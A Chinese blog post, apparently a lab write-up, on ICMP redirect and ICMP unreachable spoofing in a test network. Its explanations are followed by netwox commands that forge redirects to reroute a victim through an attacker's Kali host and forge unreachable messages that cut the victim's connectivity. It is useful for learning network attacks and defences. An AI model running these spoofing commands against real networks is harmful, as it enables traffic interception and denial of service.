ICMP的重定向、不可达攻击

最新推荐文章于 2024-05-29 23:11:30 发布
最新推荐文章于 2024-05-29 23:11:30 发布
阅读量2.5k 收藏 9
点赞数 2
分类专栏: 安全渗透—Hacker 文章标签: 安全漏洞 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41959899/article/details/104935367
版权

ICMP重定向攻击

ICMP重定向:

字面意思是重新定义方向,即处于一个网段设备A、B、C,A想要去C,却把报文发给了B,B随即告诉A,你直接去C,不用来我这里

ICMP重定向攻击:

伪造者伪装成网关,就可以分配ICMP重定向后的方向

实验环境如下:

 

实验拓扑为:

在攻击之前,要保证PC1与PC2能通

R1 R2运行OSPF协议

 

测时:
PC1->PC2

攻击者也要与目的地址相通,配置路由

# ip route add 10.1.1.0/24 via 192.168.211.222

测试:

 

实施攻击:

思路:

  1. 伪造的是一个ICMP的重定向包
  2. 给被攻击主机一个新的网关地址,以目前网关的名义发出

命令:

$ sudo netwox 86 -f "host 192.168.211.100" -g "192.168.211.130" -i  "192.168.211.254"

此时PC1 tracert PC2,在Kali上抓取ICMP的重定向报文,可见虽然是真实的网关发送的重定向报文,但是网关已经被更改为Kali的地址

 

 

 

而没有攻击的时候,Kali是收不到重定向报文的

ICMP不可达攻击

添加一个HTTP服务器,打开其80端口的服务

思路:

伪造一个ICMP不可达信息给受害主机

sudo netwox 82 -f "host 100.1.1.1 and port  80" -i "192.168.211.100"

 

另一种方法是将自己的网卡转发功能关掉,然后进行ICMP欺骗攻击,效果与ICMP不可达攻击一样,都是导致被攻击主机不能ping通

"

sudo netwox 82 -f "host 10.1.1.1 " -i "192.168.211.100"

 

 

Eichi_
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析ICMP协议
wei.zhou的专栏
04-29 1912
ICMP(Internet Control Message Protocol)是Internet控制报文协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。例如我们都知道IP 协议是不可靠协议,不能保证 IP 数据报能够成功的到目的主机,无法进行差错控制,而 IC
Destination unreachable(Port unreachable) 错误原因和解决办法
热门推荐
天道酬勤
06-26 2万+
如果连接成功,则说明端口是打开的;因此,如果确实是防火墙阻止了连接,您应谨慎地评估是否需要修改防火墙规则以允许所需的连接,并确保采取适当的安全措施。防火墙旨在通过过滤传入和传出的流量来保护网络,如果防火墙规则阻止对特定端口的访问,则会生成"目的不可端口不可)"消息。3、临时禁用防火墙:为了排除防火墙是导致连接问题的原因,您可以尝试临时禁用防火墙,然后再次尝试连接目标设备的端口。然而,需要注意的是,由于ICMP消息的特性,它也可以被恶意使用,例如进行洪泛攻击ICMP洪泛攻击)或作为信息收集的手段。
ICMP(Internet Control Message Protocol)目标不可错误消息
最新发布
青衫客36的博客
05-29 751
ICMP不可消息是网络诊断和故障排除的重要工具,它提供了关于网络、主机、协议和端口的各种不可问题的详细信息。理解这些消息及其含义有助于网络管理员快速定位和解决网络问题。
ICMP协议
ssslq的博客
03-27 2332
ICMP基础
攻防技术-单包攻击防范:扫描、畸形、特殊(HCIP)
qq_45022073的博客
12-29 1678
1、了解单包攻击类型。 2、了解扫描窥探、畸形报文、特殊报文的各种攻击方式以及防御方法。 3、了解URPF技术作用。
icmp目的主机不可消息为什么由其他非网关的ip发出?
wj31932的博客
03-03 5258
看到网上有这样的问题,ping后发现不通的目的主机不可怎么是由另一个ip发出?今天抓包探究一下。 首先,目的不可消息属于icmp消息,属于ip层之上的消息,用来完成差错控制和测试。当ping命令发出后,消息到对应网关设备,网关去查询arp映射表,当没有查到对应arp映射时,会发出arp查询消息,查询对应ip的mac地址,当查询失败时,网关会生成一个icmp的host unreachable消息发给源主机。发给源主机的过程,就是查询路由表的过程,由正常的回程路由接口的ip发出icmp消息。 下...
实验七 ICMP 协议分析实验
Sum
11-23 1万+
实验七 ICMP 协议分析实验 1.ICMP 协议介绍 ICMP(Internet Control Message Protocol)是因特网控制报文协议[RFC792]的缩写,是因特网的标准协议。ICMP允许路由器或主机报告差错情况和提供有关信息,用以调试、监视网络。 (1)ICMP 的报文格式 图1 ICMP 回送请求和应答报文格式 在网络中,ICMP 报文将封装在IP数据报中进行传输。由于ICMP的报文类型很多,且又有各自的代码,因此,ICMP并没有一
ICMP详解PPT及配套文档讲义
05-17
1. **类型3:错误消息**,包括目标不可、源抑制、网络不可、主机不可、协议不可端口不可重定向等。 2. **类型8:回显请求**,即ping命令,用于测试网络连通性。 3. **类型0:回显应答**,回应ping请求...
icmp协议,方便学习ICMP协议
09-19
1. **目的不可**:当IP数据包不能送目的地时,接收方会发送一个ICMP目的不可报文,可能的原因有网络不可、主机不可端口不可等。 2. **超时**:如果IP数据包在网络中传输超过预定时间仍未到目的地,...
南京服务器ICMP
12-03
不同类型的ICMP报文有不同的代码值,如类型3表示错误报文,其中代码0表示目的不可,代码1表示源抑制(拥塞控制)。 南京服务器在处理ICMP报文时,可能会遇到一些安全问题。例如,ICMP Flood攻击就是利用大量...
ICMP详解
08-22
ICMP报文通常由路由器或主机发送,用来通知接收方关于数据包传输的问题,如目的不可、超时、重定向等。由于ICMP不涉及端口号,与TCP和UDP不同,它的报文包含类型(type)和代码(code)两个域,用于区分不同的错误...
园区网络安全设计.docx
06-07
扫描的防范、ICMP重定向不可报文控制功能、Tracert报文控制功能、带路由记录选项IP报文控制功能等,全面防范各种网络层的攻击行为; 园区网络安全设计全文共9页,当前为第2页。 园区网络安全设计全文共9页,当前...
ICMP重定向
Galdys的专栏
10-26 8911
ICMP重定向报文是ICMP控制报文中的一种。在特定的情况下,当路由器检测到一台机器使用非优化路由的时候,它会向该主机发送一个ICMP重定向报文,请求主机改变路由。路由器也会把初始数据报向它的目的地转发 ICMP应用分析-ICMP重定向     ICMP虽然不是路由协议,但是有时它也可以指导数据包的流向(使数据流向正确的网关)。ICMP协议通过ICMP重定向数据包(类型
网络-ICMP协议、Ping命令实现与ICMP攻击
关注网络安全、云原生安全
12-14 5205
简介 ICMP(Internet Control Message Protocol,网际控制报文协议)是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 报文格式 ICMP报文分为两类:一类通知出错原因 ,一类用于诊断查询。 ICMP报文格式 类型:占一字节,标识ICMP报文的类型,从类型值来看ICMP报文可以分为两大类。第一类是取.
实验一:ICMP重定向攻击
chuxuezheerer的博客
10-09 5433
实验原理: ICMP重定向信息是路由器向主机提供实时的路由信息,当一个主机收到ICMP重定向信息时,它就会根据这个信息来更新自己的路由表。由于缺乏必要的合法性检查,如果一个黑客想要被攻击的主机修改它的路由表,黑客就会发送ICMP重定向信息给被攻击的主机,让该主机按照黑客的要求来修改路由表。 在VMware虚拟环境中(Virtual Box不同),.2是充当网关的默认地址(通过route命令可以查看当前的网关和路由信息);所以攻击者可以冒充.2发出重定向包,通知受害者修改自己的网关为攻击者指定的gw地址;如果
icmp报文_ICMP重定向抓包分析
weixin_39581571的博客
12-01 1383
ICMP Redirect重定向消息用于支持路由功能。如图所示,主机A希望发送报文到服务器A,于是根据配置的默认网关地址向网关RTB发送报文。网关RTB收到报文后,检查报文信息,发现报文应该转发到与源主机在同一网段的另一个网关设备RTA,因为此转发路径是更优的路径,所以RTB会向主机发送一个Redirect消息,通知主机直接向另一个网关RTA发送该报文。主机收到Redirect消息后,会向RTA发...
网络安全ICMP重定向攻击
木瓜有益健康的博客
03-28 4906
网络安全——ICMP重定向攻击网络命令网络工具——netwox 网络命令 网络不可用 $ ping ${域名} $ ping ${ip地址} $ ifconfig #lo:本地网卡;enss:朝外发包的网卡 $ ifconfig -a #对比上一条结果,查看哪个网卡未开启 $ route #route -n查看本机网络状况 $ netstat -lt #正在监听的tcp端口,-p显示进程号 $...
攻防战略 ICMP常见攻击及防范措施
无限深蓝的专栏
04-06 8287
懂得网络的人都知道我们常用Ping命令来检查网络是否畅通的一个简单的手段,可是这个Ping也能给Windows系统带来不可预测的灾难,那就是Ping入侵即是ICMP入侵,后果是相当严重的。所以这里我们要详细讨论一下ICMP攻击方法及防范措施。  ICMP攻击及欺骗技术  所谓:“知己知彼,百战不怠”,要学会防范就必须知道攻击是怎样的。使用ICMP攻击的原理实际上就是通过Ping大量的数据包
预防ICMP重定向攻击
04-23
ICMP重定向攻击是一种利用网络控制协议(ICMP)的攻击方式,攻击者发送虚假的ICMP重定向消息来欺骗网络中的主机,导致其流量被重定向攻击者指定的网站或者服务器。为了预防ICMP重定向攻击,可以采取以下措施: 1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值